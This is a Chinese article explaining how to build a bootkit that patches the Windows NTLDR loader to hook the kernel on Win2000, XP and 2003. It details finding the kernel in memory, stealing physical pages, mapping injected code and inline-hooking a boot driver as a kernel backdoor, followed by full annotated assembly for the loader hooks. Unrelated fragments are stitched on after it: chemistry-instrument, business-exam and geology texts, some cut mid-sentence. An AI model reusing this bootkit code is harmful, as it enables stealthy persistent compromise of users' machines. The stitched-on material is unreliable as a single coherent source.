基于NTLDR的BOOTKIT原理及实现解析
本文是基于NTLDR的Bootkit原理及实现的介绍,Bootkit在安全领域被认为是一种高级的 Rootkit形式,对于用户的信息安全而言威胁巨大。本文意在讲述后如何映射内存和HOOK内核,以求更为巧妙的技术出现。
NTLDR是Windows NT系列内核的Osloader,当开机以后BIOS载入MBR,MBR 载入DBR,然后DBR载入NTLDR,并将执行权转交给NTLDR,最后再来启动内核。理论上讲NTLDR是最接近内核的,而且对NTLDR做HOOK,可以避免针对各种外设的编码工作,提高通用性。BOOTKIT具有以下几个特点:
1.在Ring3下可完成Hook(改写NTLDR);
2.注入内核的代码没有内存大小限制,也无需自己读入代码;
3.BOOTDRIVER驱动初始化时加载(依情况而定,也可hook内核其它地方);
4.理论上可以Hook各种版本ntldr;
5.理论上可以引导各个版本NT内核和内存相关boot.ini参数。
本文适用范围仅限于Win2000 sp4、WinXp sp2、Win2003 sp1,暂时没有对PAE内核,x64和内存相关BOOT.INI参数提供支持。
一、NTLDR的HOOK:
要做NTLDR的BOOTKIT,我们首先面临的问题就是如何对NTLDR做HOOK?要对NTLDR做HOOK,那就首先要对NTLDR的文件结构有所理解才行。NTLDR是由两部分构成,一部分是被称作Su Module(Startup)的16位汇编代码,另一部分则是名为Osloader的PE文件。Su module位于NTLDR的头部,Osloader紧随其后。DBR将NTLDR加载到物理地址2000:0000开始的地方,然后跳转到这个地址,将控制权交给NTLDR进行引导,而这个地址也就是Su的入口。Su的主要功能是为Osloader准备内存环境。在Windows 2003中为了避免Su对NTDLR完整性检测,本文将会用没有校验的Su替换了它。
Osloader,它的作用比较复杂,说的简单点就是为内核准备执行环境,然Osloader会根据boot.ini的设置将Windows内核、hal.dll和其它Boot Driver 加载进内存。有关NTLDR更详细的结构和功能,请读者参看有关资料。
了解了NTLDR的大致结构和功能。接着我们来看一下我们HOOK NTLDR所存在的问题?首先就是该在哪下手,理论上你可以在任何一个地方下手,但是接下来你该跳转到哪里呢?执行HOOK CODE之后,才能让CPU有个地方可以去。我选择将CODE放在Osloader里,没错,Su会按SECTION的地址重定位Osloader,这样我们就可以很轻松地定位我们CODE的地址。我的做法就是直接用工具在Osloader里新建了一个节,将所有HOCK代码都放在了里面。因为我们的根本目的是要HOOK内核,所以执行代码的时候,内核要已经被加载进了内存。那我们怎么知道在哪内核已经被加载进了内存呢?通常,在将控制权交给内核之前,
Osloader会调用函数BlSetupForNt,这个函数的会最后做些设置的收尾工作,包括剪裁页表。在BlSetupForNt函数里面存在如下特征码:
mov eax, cr3
mov cr3, eax (机器码:“0F 20 D8 0F 22 D8” )
这段代码是用来刷新TLB的,这段代码在内核加载前后被频繁调用的。为了顺利HOOK内核,所以我在CODE里加入保护性代码,通过这段代码几乎可以在任何完整指令处进行HOOK。你可以下很多HOOK,不过得有一个是在内核加载之后执行的。利用这段特征串可以比较方面的找到HOOK点。
实际过程中“0F 20 D8 0F 22 D8” 串会集中出现在文件头的部分和文件尾的部分,建议只HOOK文件尾的串。这里使用"call RVA"共5个字节的指令来实现跳转。
小提示:Osloader位置的确定可以直接搜索特征值"MZ", "PE"。
二、内核的加载与定位
当控制权顺着hook代码,我们必须确定内核是否加载。这里我们首先想到的办法就是硬编码内核一个地址,然后测试这个地址是否有效,因为同一个NTLDR总会将内核加载在同一个地址。但是这样的通用性不高,ring3下面的工作会增加。为了使测试具有较高通用性,我使用了暴力搜索的方法,从可能的加载地址:VA0x80400000~0x81000000。为了不致引起page fault,首先必须从PDE搜索起,再确定PTE是否有效,然后测试MZ、PE标志,最后ImageSize的大小要大于0x150000(也就内核这么大了),这是为了避免其它PE文件影响结果,像Osloader。
三、对内核做HOOK
这个时候整个内核就在我们眼前了,但是我们还不能直接动手,因为我们现在代码所在的内存会在内核初始化的时候被清洗掉,所以我们还要HOOK一次EntryPoint。这是为了获取内核入口函数KiSystemStartup的参数LoaderBlock。
这是一个类型名为LOADER_PARAMETER_BLOCK的指针。它的结构如下:
typedef struct _LOADER_PARAMETER_BLOCK {
LIST_ENTRY LoadOrderListHead;
LIST_ENTRY MemoryDescriptorListHead;
LIST_ENTRY BootDriverListHead;
ULONG KernelStack;
ULONG Prcb;
ULONG Process;
ULONG Thread;
ULONG RegistryLength;
PVOID RegistryBase;
PCONFIGURATION_COMPONENT_DATA ConfigurationRoot;
PCHAR ArcBootDeviceName;
PCHAR ArcHalDeviceName;
PCHAR NtBootPathName;
PCHAR NtHalPathName;
PCHAR LoadOptions;
PNLS_DATA_BLOCK NlsData;
PARC_DISK_INFORMATION ArcDiskInformation;
PVOID OemFontFile;
struct _SETUP_LOADER_BLOCK *SetupLoaderBlock;
ULONG Spare1;
union {
I386_LOADER_BLOCK I386;
MIPS_LOADER_BLOCK Mips;
ALPHA_LOADER_BLOCK Alpha;
PPC_LOADER_BLOCK Ppc;
} u;
} LOADER_PARAMETER_BLOCK, *PLOADER_PARAMETER_BLOCK;
在这里我们能找到很多我们想得到的数据,以便我们能成功hook内核
四、内存作业
当CPU执行到这里的时候,我们已经来到了内核入口点。为了可以常驻内核,我们有两样工作要做,首先,设法找到空闲的物理页用于映射;其次,找一个虚拟地址空间映射我们找到的物理页。对于第一步,我需要利用LoaderBlock中的MemoryDescriptorListHead。它指向的实际数据结构如下:
typedef struct _MEMORY_ALLOCATION_DESCRIPTOR {
LIST_ENTRY ListEntry;
TYPE_OF_MEMORY MemoryType;
ULONG BasePage;
ULONG PageCount;
} MEMORY_ALLOCATION_DESCRIPTOR, *PMEMORY_ALLOCATION_DESCRIPTOR;
其中MemoryType为
typedef enum _TYPE_OF_MEMORY {
LoaderExceptionBlock = MemoryExceptionBlock, // 0 LoaderSystemBlock = MemorySystemBlock, // 1
LoaderFree = MemoryFree, // 2
LoaderBad = MemoryBad, // 3 LoaderLoadedProgram = MemoryLoadedProgram, // 4
LoaderFirmwareTemporary = MemoryFirmwareTemporary, // 5 LoaderFirmwarePermanent = MemoryFirmwarePermanent, // 6 LoaderOsloaderHeap, // 7 LoaderOsloaderStack, // 8 LoaderSystemCode, // 9 LoaderHalCode, // a LoaderBootDriver, // b
LoaderConsoleInDriver, // c LoaderConsoleOutDriver, // d LoaderStartupDpcStack, // e LoaderStartupKernelStack, // f LoaderStartupPanicStack, // 10 LoaderStartupPcrPage, // 11 LoaderStartupPdrPage, // 12 LoaderRegistryData, // 13
LoaderMemoryData, // 14 LoaderNlsData, // 15 LoaderSpecialMemory, // 16
LoaderMaximum // 17 } TYPE_OF_MEMORY;
“借”物理内存的方法有很多种,我们可以遍历List,将合乎我们要求的DESCRIPTOR标记为LoaderSystemCode或者 LoaderBad等等。本文说使用的方法主要在BasePage和PageCount两个参数上做文章。它们分别代表了这个DESCRIPTOR起始页号和包含的物理页数。只要修改这两个参数,就可以获取物理内存的空间了。
接下来我们要做的事就是在虚拟内存中映射我们自己,4GB的空间我们应该映射在哪里呢?我首先注意到的就是最后4MB的空间,这个空间是给 Hal用的,但实验表明这一块的区域会被重写,导致我们的地址被抹去,所以是不可用的。这里所使用的方法是在内核虚拟地址所在的那个PDE的后面一个 PDE开始寻找虚拟地址空间,找的PDE是有效PDE,然后再在页表中找无效PTE,将要映射的物理地址的PTE写入这个无效PTE。最后这种方法成功了,不仅没有抹去,连进入windows之后这片内存还完整的存在。
在Win2k中,这种找地址的方法会遇到麻烦,这是由于Win2k的内存管理不同于它的后辈,它使用4MB的LARGE_PAGE进行管理,从内核地址空间开始一共连续映射512MB物理内存,所以用这种方法得到的虚拟地址最后会不存在,导致BSOD。其实Win2k中对于虚拟地址的计算还要简单,那就是:虚拟地址
=0x80000000+物理地址。
这样经过这两步,我们已经在内核中有了属于自己的天地。
五、建造后门
现在获取了内存的驻留权,下面就需要考虑如何建立系统后门,这里还是借助LoaderBlock。LoadOrderListHead和 BootDriverListHead,这两个参数所链接的代码都会在ExpInitializeExecutive函数中初始化,并且LoadOrderListHead所链代码会先于BootDriverListHead被调用。而BootDriverListHead则是在IO system被初始化时调用。鉴于内核的初始化程度,我选择了后者BootDriverListHead。BootDriverListHead实际上所指向的是BOOT_DRIVER_LIST_ENTRY这么一个结构:
typedef struct _BOOT_DRIVER_LIST_ENTRY {
LIST_ENTRY Link;
UNICODE_STRING FilePath;
UNICODE_STRING RegistryPath;
PLDR_DATA_TABLE_ENTRY LdrEntry;
} BOOT_DRIVER_LIST_ENTRY, *PBOOT_DRIVER_LIST_ENTRY;
其中的LdrEntry就是关键了,关于这个结构我只找到它的部分域,但是已经够用了:
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
+0x034 Flags : Uint4B
+0x038 LoadCount : Uint2B
+0x03a TlsIndex : Uint2B
+0x03c HashLinks : _LIST_ENTRY
+0x03c SectionPointer : Ptr32 Void
+0x040 CheckSum : Uint4B
+0x044 TimeDateStamp : Uint4B
+0x044 LoadedImports : Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 Void
+0x04c PatchInformation : Ptr32 Void
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
通过LdrEntry就可以找到BootDriver的EntryPoint,对它做inline hook 就可以了。这里要注意三点:1、只有Flags为某个值时,它才会被初始化(或者说这个BootDriver的DriverEntry函数才会被调用); 2、由于加载的驱动会被搬移到内存高地址,所以要做inline hook; 3、这个时候驱动还没有relocate,所以某些间接寻址的代码会被修改,所以要找一个代码不会被修改的值。我们使用了7个字节来调用我们的代码 (mov eax, xxxxxx; call eax;),所以要保证这7个字节不会修改。
我在win2k的某个驱动中找到了这样的代码段:
55 PUSH EBP 8BEC MOV EBP,ESP 83EC 10 SUB ESP,10
XP中:
8BFF MOV EDI,EDI
55 PUSH EBP
8BEC MOV EBP,ESP
只要inline hook这样的驱动就可以保证不会在relocate后,执行不必要的麻烦。如此,一扇通向系统内核的大门就做好了。
六、源代码
这段代码成功引导了win2k sp4、winxp sp2、win2003 sp1、wrk等内核,不支持PAE内核和VISTA,还有一些与内存有关的boot.ini的参数也不支持。
//---------------------------------Module 1------------------------------------------------------------------
// 修复返回地址,直接执行被hook的代码,这样比修复省n个字节00484000: FF0424 INC DWORD PTR [ESP] 00484003: 0F20D8 MOV EAX,CR3 00484006: 0F22D8 MOV CR3,EAX
// 可能会被重复执行,避免重复hook内核
00484009: 803D FF404800 01 CMP BYTE PTR [4840FF],1 00484010: 75 01 JNZ SHORT 00484013 00484012: C3 RETN
// 在VA:0x80400000~0x81000000范围内暴搜内核,以确定内核已经加载及找到ImageBase
00484013: 53 PUSH EBX
00484014: 51 PUSH ECX
00484015: B8 00F03F80 MOV EAX,803FF000 0048401A: 05 00100000 ADD EAX,1000
0048401F: 3D 00000081 CMP EAX,81000000 // 搜索失败
00484024: 0F84 74000000 JE 0048409E
0048402A: 8BD8 MOV EBX,EAX
0048402C: C1EB 16 SHR EBX,16
0048402F: C1E3 02 SHL EBX,2
00484032: 81CB 000030C0 OR EBX,C0300000 00484038: F703 01000000 TEST DWORD PTR [EBX],1 0048403E: 74 DA JE SHORT 0048401A 00484040: 8BD8 MOV EBX,EAX 00484042: C1EB 0A SHR EBX,A
00484045: 81C3 000000C0 ADD EBX,C0000000 0048404B: F703 01000000 TEST DWORD PTR [EBX],1 00484051: 74 C7 JE SHORT 0048401A 00484053: 66:8138 4D5A CMP WORD PTR [EAX],5A4D // 'MZ' flag
00484058: 75 C0 JNZ SHORT 0048401A 0048405A: 8B58 3C MOV EBX,[EAX+3C] 0048405D: 813C18 50450000 CMP DWORD PTR [EAX+EBX], 4550 // 'PE' flag
00484064: 75 B4 JNZ SHORT 0048401A 00484066: 817C18 50 00001500 CMP DWORD PTR [EAX+EBX+5
0],150000 // ImageSize >= 0x150000 bytes
0048406E: 7C AA JL SHORT 0048401A
// 将内核的ImageBase写入0x4849FC内,并找到内核的EntryPoint做
inline hook
00484070: A3 FC494800 MOV [4849FC],EAX 00484075: 034418 28 ADD EAX,[EAX+EBX+28] 00484079: 8B18 MOV EBX,[EAX]
0048407B: 8B48 04 MOV ECX,[EAX+4] 0048407E: 50 PUSH EAX
0048407F: B8 F0404800 MOV EAX,4840F0 00484084: 8918 MOV [EAX],EBX 00484086: 8948 04 MOV [EAX+4],ECX 00484089: 58 POP EAX
0048408A: C700 B8004148 MOV DWORD PTR [EAX],4841 00B8 // 写入 "mov eax, 0x484100"
00484090: C740 04 00FFD000 MOV DWORD PTR [EAX+4],D0 FF00 // "call eax"
00484097: C605 FF404800 01 MOV BYTE PTR [4840FF],1 0048409E: 59 POP ECX
0048409F: 5B POP EBX
004840A0: C3 RETN
//-----------------------------------------Module 2-------------------------------------------------------
// 修复返回地址和内核入口代码
00484100: 832C24 07 SUB DWORD PTR [ESP],7 00484104: B8 F0404800 MOV EAX,4840F0 00484109: 8B18 MOV EBX,[EAX]
0048410B: 8B48 04 MOV ECX,[EAX+4] 0048410E: 8B0424 MOV EAX,[ESP] 00484111: 8918 MOV [EAX],EBX 00484113: 8948 04 MOV [EAX+4],ECX
// 暴搜MemoryDescriptor,寻找合适的物理内存页存放代码
00484116: 55 PUSH EBP
00484117: 8BEC MOV EBP,ESP 00484119: 83C5 0C ADD EBP,C
0048411C: 8B6D 00 MOV EBP,[EBP]
0048411F: 8BDD MOV EBX,EBP 00484121: 83C3 08 ADD EBX,8
00484124: 8B1B MOV EBX,[EBX]
00484126: 837B 08 02 CMP DWORD PTR [EBX+8],2 // MemoryType == MemoryFree
0048412A: 75 F8 JNZ SHORT 00484124 0048412C: 817B 0C 00100000 // no me aning, just for debugging.
00484133: 837B 10 10 CMP DWORD PTR [EBX+10],1
00484137: 7C EB JL SHORT 00484124 00484139: 8B53 0C MOV EDX,[EBX+C]
0048413C: 8343 0C 05 ADD DWORD PTR [EBX+C],5 // " 借"5个物理页(没的还的)
00484140: 836B 10 05 SUB DWORD PTR [EBX+10],5
// 开始暴搜页表,寻找合适的虚拟地址映射注入的代码
00484144: A1 FC494800 MOV EAX,[4849FC] 00484149: C1E8 16 SHR EAX,16
0048414C: C1E0 02 SHL EAX,2
0048414F: 05 000030C0 ADD EAX,C0300000 00484154: 83C0 04 ADD EAX,4 // 在 ImageBase后所在PDE的下一个PDE开始搜索
00484157: 83E8 04 SUB EAX,4 // 主要是避开使用NTLDR的虚拟地址
0048415A: 83C0 04 ADD EAX,4
0048415D: 8B18 MOV EBX,[EAX]
0048415F: 83E3 01 AND EBX,1
00484162: 74 F6 JE SHORT 0048415A 00484164: 50 PUSH EAX
00484165: C1E0 0A SHL EAX,A
00484168: 33C9 XOR ECX,ECX
0048416A: 83C1 04 ADD ECX,4
0048416D: 8B5C08 FC MOV EBX,[EAX+ECX-4] 00484171: 83E3 01 AND EBX,1
00484174: 74 0B JE SHORT 00484181 00484176: 81F9 00100000 CMP ECX,1000
0048417C: 75 EC JNZ SHORT 0048416A 0048417E: 58 POP EAX
0048417F: EB D9 JMP SHORT 0048415A 00484181: 5B POP EBX
// 在找到的PTE地址里写入要映射的物理内存页号等信息
00484182: C1E2 0C SHL EDX,C
00484185: 81CA 63010000 OR EDX,163
0048418B: 03C1 ADD EAX,ECX
0048418D: 83E8 04 SUB EAX,4
00484192: 0F20DB MOV EBX,CR3
00484195: 0F22DB MOV CR3,EBX
00484198: C1E0 0A SHL EAX,A
0048419B: 8BD0 MOV EDX,EAX
// 判断内核的版本是不是NT 5.0(win2000)
0048419D: A1 FC494800 MOV EAX,[4849FC]
004841A2: 8B58 3C MOV EBX,[EAX+3C]
004841A5: 807C18 46 00 CMP BYTE PTR [EAX+EBX+46 ],0
004841AA: 75 07 JNZ SHORT 004841B3 004841AC: 68 00200000 PUSH 2000
004841B1: EB 05 JMP SHORT 004841B8 004841B3: 68 01200000 PUSH 2001
// 在BootDriver中找一个合适的驱动做inline hook
004841B8: 8BC5 MOV EAX,EBP
004841BA: 83C0 10 ADD EAX,10
004841BD: 8B00 MOV EAX,[EAX]
004841BF: 8B48 18 MOV ECX,[EAX+18]
004841C2: 8B09 MOV ECX,[ECX]
004841C4: 8179 34 00400000 CMP DWORD PTR [ECX+34],4 000 // 观察值,flag为0x4000,该驱动的DriverEntry才会被调用
004841CB: 75 F0 JNZ SHORT 004841BD 004841CD: 8B49 1C MOV ECX,[ECX+1C]
004841D0: 8B19 MOV EBX,[ECX]
004841D2: 813C24 00200000 CMP DWORD PTR [ESP],2000 004841D9: 75 10 JNZ SHORT 004841EB 004841DB: 81FB 558BEC83 CMP EBX,83EC8B55 // 特征值 "558BEC83EC"
004841E1: 75 DA JNZ SHORT 004841BD 004841E3: 8079 04 EC CMP BYTE PTR [ECX+4],EC 004841E7: 75 D4 JNZ SHORT 004841BD 004841E9: EB 0E JMP SHORT 004841F9 004841EB: 81FB 8BFF558B CMP EBX,8B55FF8B // 特征值 "8BFF558BEC"
004841F1: 75 CA JNZ SHORT 004841BD 004841F3: 8079 04 EC CMP BYTE PTR [ECX+4],EC // 两处特征值可以保证inline hook的代码
004841F7: 75 C4 JNZ SHORT 004841BD // 不会被Relocate。
004841F9: 8B01 MOV EAX,[ECX]
004841FB: 8982 F00F0000 MOV [EDX+FF0],EAX
00484204: 8982 F40F0000 MOV [EDX+FF4],EAX 0048420A: C601 B8 MOV BYTE PTR [ECX],B8 // hook DriverEntry
0048420D: 52 PUSH EDX // 写入 "mov eax, xxxxxxx; call eax"
0048420E: 817C24 04 00200000 CMP DWORD PTR [ESP+4],20 00
00484216: 75 1A JNZ SHORT 00484232
00484218: C1EA 0C SHR EDX,C // 重新计算win2k中,注入代码的虚拟地址
0048421B: C1E2 02 SHL EDX,2
0048421E: 81C2 000000C0 ADD EDX,C0000000 00484224: 8B12 MOV EDX,[EDX] 00484226: 81E2 00F0FFFF AND EDX,FFFFF000 0048422C: 81C2 00000080 ADD EDX,80000000 00484232: 8951 01 MOV [ECX+1],EDX 00484235: 66:C741 05 FFD0 MOV WORD PTR [ECX+5],D0F F
0048423B: 5A POP EDX
0048423C: 58 POP EAX
// 将要注入的代码复制到目标地址里
0048423D: B8 00454800 MOV EAX,484500 00484242: 33C9 XOR ECX,ECX 00484244: 8B1C08 MOV EBX,[EAX+ECX] 00484247: 891C11 MOV [ECX+EDX],EBX 0048424A: 83C1 04 ADD ECX,4
0048424D: 81F9 00050000 CMP ECX,500 00484253: 75 EF JNZ SHORT 00484244 00484255: 5D POP EBP
00484256: C3 RETN
//------------------------------------------Module 3-----------------------------------------------
// 为注入的代码,只调用了DbgPrint打印了一句话
00484500: 50 PUSH EAX
00484501: E8 00000000 CALL 00484506 00484506: 58 POP EAX
00484507: 83E8 06 SUB EAX,6
0048450A: 53 PUSH EBX
0048450B: 836C24 08 07 SUB DWORD PTR [ESP+8],7
00484514: 51 PUSH ECX
00484515: 52 PUSH EDX
00484516: 8B88 F00F0000 MOV ECX,[EAX+FF0] 0048451C: 8B90 F40F0000 MOV EDX,[EAX+FF4] 00484522: 890B MOV [EBX],ECX 00484524: 8953 04 MOV [EBX+4],EDX 00484527: 8D98 00040000 LEA EBX,[EAX+400] 0048452D: 53 PUSH EBX
0048452E: 68 08000000 PUSH 8
00484533: 8D98 90010000 LEA EBX,[EAX+190] 00484539: 53 PUSH EBX
0048453A: FFB0 FC040000 PUSH DWORD PTR [EAX+4FC] 00484540: E8 BB010000 CALL 00484700 00484545: FFD0 CALL NEAR EAX 00484547: 83C4 04 ADD ESP,4
0048454A: 5A POP EDX
0048454B: 59 POP ECX
0048454C: 5B POP EBX
0048454D: 58 POP EAX
0048454E: C3 RETN
// 根据目标函数字符串,在内核的导出表中寻找查找内核函数,并返回内核函数的虚拟地址
00484700: 55 PUSH EBP
00484701: 8BEC MOV EBP,ESP 00484703: 8B45 08 MOV EAX,[EBP+8] 00484706: 8B58 3C MOV EBX,[EAX+3C] 00484709: 03C3 ADD EAX,EBX
0048470B: 83C0 78 ADD EAX,78
0048470E: 8B18 MOV EBX,[EAX] 00484710: 035D 08 ADD EBX,[EBP+8] 00484713: 8B43 20 MOV EAX,[EBX+20] 00484716: 0345 08 ADD EAX,[EBP+8] 00484719: 9C PUSHFD
0048471A: FC CLD
0048471B: 56 PUSH ESI
0048471C: 57 PUSH EDI
0048471D: 33D2 XOR EDX,EDX
0048471F: 8B75 0C MOV ESI,[EBP+C] 00484722: 8B4D 10 MOV ECX,[EBP+10] 00484725: 8B3C90 MOV EDI,[EAX+EDX*4] 00484728: 037D 08 ADD EDI,[EBP+8]
0048472B: F3 REPE CMPSB
0048472C: A6 CMPSB
0048472D: 74 03 JE SHORT 00484732 0048472F: 42 INC EDX
00484730: EB ED JMP SHORT 0048471F 00484732: 5F POP EDI
00484733: 5E POP ESI
00484734: 9D POPFD
00484735: 8B43 24 MOV EAX,[EBX+24] 00484738: 0345 08 ADD EAX,[EBP+8] 0048473B: 66:8B0C50 MOV CX,[EAX+EDX*2] 0048473F: 8B43 1C MOV EAX,[EBX+1C] 00484742: 0345 08 ADD EAX,[EBP+8] 00484745: 0FB7C9 MOVZX ECX,CX
00484748: 8B0488 MOV EAX,[EAX+ECX*4] 0048474B: 0345 08 ADD EAX,[EBP+8] 0048474E: 5D POP EBP
0048474F: C2 0C00 RETN C
总结:
关于BOOTKIT有很多种实现,虽然此篇也是BOOTKIT,但使用的技术却很常规,本文意在讲述后如何映射内存和HOOK内核,以求更为巧妙的技术出现。
解析各种检测器原理、用途和作用
气相色谱仪-检测系统 1.热导检测器热导检测器 ( Thermal coductivity detector,简称TCD ),是应用比较多的检测器,不论对有机物还是无机气体都有响应。热导检测器由热导池池体和热敏元件组成。热敏元件是两根电阻值完全相同的金属丝(钨丝或白金丝),作为两个臂接入惠斯顿电桥中,由恒定的电流加热。如果 热导池只有载气通过,载气从两个热敏元件带走的热量相同,两个热敏元件的温度变化是相同的,其电阻值变化也相同,电桥处于平衡状态。如果样品混在载气中通过测量池,由于样号气和载气协热导系数不同,两边带走的热量不相等,热敏元件的温度和阻值也就不同,从而使得电桥失去平衡,记录器上就有信号产生。这种检测器是一种通用型检测器。被测物质与载气的热导系数相差愈大,灵敏度也就愈高。此外,载气流量和热丝温度对灵敏度也有较大的影响。热丝工作电流增加—倍可使灵敏度提高3—7倍,但是热丝电流过高会造成基线不稳和缩短热丝的寿命。热导检测器结构简单、稳定性好,对有机物和无机气体都能进行分析,其缺点是灵敏度低。 2.气相色谱仪氢火焰离子化检测器 氢火焰离子化检测器(Flame Ionization Detector,FID) 简称氢焰检测器。它的主要部件是一个用不锈钢制成的离子室。离子室由收集极、极化极(发射极)、气体入口 及火焰喷嘴组成。在离子室下部,氢气与载气混合后通过喷嘴,再与空气混合点火燃烧,形成氢火焰。无样品时两极间离子很少,当有机物进入火焰时,发生离子化反应,生成许多离子。在火焰上方收集极和极化极所形成的静电场作用下,离子流向收集极形成离子流。离子流经放大、记录即得色谱峰。有机物在氢火焰中离子化反应的过程如下:当氢和空气燃烧时,进入火焰的有机物发生高温裂解和氧化反应生成自由基,自由基又与氧作用产生离子。在外加电压作用下,这些离子形成离子流,经放大后被记录下来。所产生的离子数与单位时间内进入火焰的碳原子质量有关,因此,氢焰检测器是一种质量型检测器。这种检测器对绝大多数有机物都有响应,其灵敏度比热导检测器要高几个数量级,易进行痕量
企业战略与经营决策答案解析
第一章企业战略与经营决策(答案解析) 一、单项选择题 1.企业战略是指企业在市场经济竞争激烈的环境中,在总结历史经验、调查现状、预测未来的基础上,为谋求生存和发展而作出的()的谋划或方略。 A.长远性、全局性 B.长远性、科学性 C.全局性、指导性 D.长远性、指导性 2.企业战略最根本的特征是()。 A.长期性 B.全局性 C.灵活性 D.风险性 3.企业最高管理层指导和控制企业一切行为的最高行动纲领是()。 A.企业部门战略 B.企业业务战略 C.企业职能战略 D.企业总体战略 4.企业战略层次中,主要解决资源利用效率问题,使企业资源利用效率最大化的是()。A.企业总体战略 B.企业业务战略 C.企业职能战略 D.竞争战略 5.战略管理的最高任务是()。 A.提高企业的市场占有率 B.追求企业利润最大化 C.实现特定阶段的战略目标 D.实现企业的使命 6.战略环境分析不包括()。 A.宏观环境分析 B.行业环境分析 C.中观环境分析D.企业内部环境分析 7.构成科技环境的首要因素是()。 A.科技体制 B.社会科技力量 C.社会科技水平 D.国家的科技政策与立法 8.行业生命周期分为四个阶段,市场营销和生产管理是()的关键性职能。 A.形成期 B.成长期 C.成熟期 D.衰退期 9.新的竞争对手进入市场会对现有企业构成威胁,这种威胁的大小不依()而定。 A.现有企业的反应程度 B.进入市场的障碍 C.市场潜力 D.产业内竞争的程度 10.企业制定战略的出发点、依据和条件是 () A.企业内部环境 B.企业宏观环境 C.行业环境 D.战略环境 11.企业价值链由主体活动和辅助活动构成,下列不属于辅助活动的是() A.企业基础管理 B.人力资源管理 C.生产加工 D.技术开发 12.在SWOT分析模型中,当企业处于WO象限时,可以采取()。 A.增长型战略 B.紧缩型战略 C.一体化战略 D.扭转型战略 13.企业基本竞争战略中,()的核心是加强内部成本控制,获得竞争优势。
赤平投影原理及讲解
一、序言 岩质边坡稳定性分析方法有许多,但无论是平面滑动的单一楔形断面滑体、单滑块和多滑块分析法,还是楔体滑动的仿平面分析法、楔体分割法、立体分析法、霍克分析法以及《岩土工程勘察规范》(GB50021-94)推荐法等,在计算边坡稳定性系数时,需要知道滑体控制平面(包括结构面和坡面、坡顶面)或直线(包括平面的法线)的地质产状,以及平面与平面、直线与直线、直线与平面间夹角等。其中平面和直线的产状可以通过现场测量获取,除此之外的几何参数,在没有发明极射赤平投影之前,都是用计算法求得,不仅它们的计算公式复杂,而且计算过程繁琐,也很容易出错。如果采用极射赤平投影求解边坡稳定性分析所需的几何参数,那就可以简化这些几何参数的计算过程,而且一般情况下只需要在现场测量出各个控制平面的地质产状即可。 二、极射赤平投影的基本原理 (一)投影要素 极射赤平投影(以下简称赤平投影)以圆球作为投影工具,其进行投影的各个组成部分称为投影要素,包括: 1.投影球(也称投射球):以任意长为半径的球。 2.球面:投影球的表面称为球面。 3.赤平面(也称赤平投影面):过投影球球心的水平面。 4.大圆:通过球心的平面与球面相交而成的圆,统称为大圆(如图一(a)中ASBN、PSFN、NESW),所有大圆的直径相等,且都等于投影球的直径。当平面直立时,与球面相交成的大圆称为直立大圆(如图一(a)中PSFN);当平面水平时,与球面相交成的大圆称为赤平大圆或基圆(如图一(a)中NESW);当平面倾斜时,与球面相交成的大圆称为倾斜大圆(如图一(a)中ASBN)。 5.小圆:不过球心的平面与球面相而成的圆,统称为小圆(如图一(b)、(c)中AB、CD、FG、PACB)。当平面直立时,与球面相交成的小圆称为直立小圆(如图一(b)中DC);当平面水平时,与球面相交成的小圆称为水平小圆(如图一(b)中AB);当平面倾斜时,与球面相交成的小圆称为倾斜小圆(如图一(b)中FG或图一(c)中PACB)。 6.极射点:投影球上两极的发射点(如图一),分上极射点(P)和下极射点(F)。由上极射点(P)把下半球的几何要素投影到赤平面上的投影称为下半球投影;由下极射点(F)把上半球的几何要素投影到赤平面上的投影称为上半球设影。一般采用下半球投影。 7.极点:通过球心的直线与球面的交点称为极点,一条直线有两个极点。铅直线交球面上、下两个点(也就是极射点);水平直线交基圆上两点;倾斜直线交球面上两点(如图五中A、B)。 (二)平面的赤平投影 平面与球面相交成大圆或小圆,我们把大圆或小圆上各点和上极射点(P)的连线与赤平面相交各点连线称为相应平面的赤平投影。 1.过球心平面的赤平投影随平面的倾斜而变化:倾斜平面的赤平投影为大圆弧(如图二中的NB′S);直立平面的赤平投影是基圆的一条直径(如图一(a)中的NS);水平面的赤平投影就是基圆(如图一中的NESW)。 2.不过球心平面的赤平投影也随平面倾斜而变化:直立平面的赤平投影是基圆内的一条圆弧(如图三KD′H);倾斜平面的赤平投影有以下三种情况:⑴当倾斜小圆在赤平面以下时,投影是一个圆,且全部在基圆之内(如图三FG);⑵当倾斜小圆全部位于上半球时,投影也是一个圆,但全部在基圆之外;⑶当倾斜小圆一部分在上半球,另一部分在下半球时,赤平面以下部分的投影在基圆之内,以上部分的投影在基圆之外。当球面小圆通过上极射点时,其赤平投影为一条直线(如图一(c)中PACB的投影为AB);水平小圆的赤平投影在基圆内(如图四中A′B′),A′B′是一个与基圆同心的圆。 (三)直线的赤平投影 直线AB的投影点就是其极点A、B和极射点P的连线与赤平面的交点A′、B′。铅直线的投影点位于基圆中心;过球心的水平直线的投影点就是基圆上两个极点,两点间距离等于基圆直径;倾斜直线的投影点有两个,一点在基圆内,另一个在基圆外,两点呈对蹼点,在赤平投影图上两点的角距相差180°(如图五)。 (四)吴氏网及其CAD制作 目前广泛使用的极射赤平投影有等角距投影网和等面积投影网。等角距投影网是由吴尔福发明的,简称吴氏网;等面积投影网是由施密特发明的,简称施氏网。两者的主要区别在于:球面上大小相等的小圆在吴氏网上的投影仍然是圆,投影圆的直径角距相等,但由于在赤平面上所处位置不同,投影圆的大小不等,其直径随着投影圆圆心与基圆圆心的距离增大而增大。而在施氏网上的投影则呈四级曲线,不成圆,但四级曲线所构成的图形面积是相等的,且等于球面小圆面积的一半。使用吴氏网求解面、线间的角距关系时,旋转操作显示其优越性,不仅作图方便,而且较为精确。而使用施氏网时,可以作出面、线的极点图或等密度图,能够真实反映球面上极点分布的疏密,有助于对面、线群进行统计分析,但其存在作图麻烦等缺点。
会计学原理复习题及参考答案
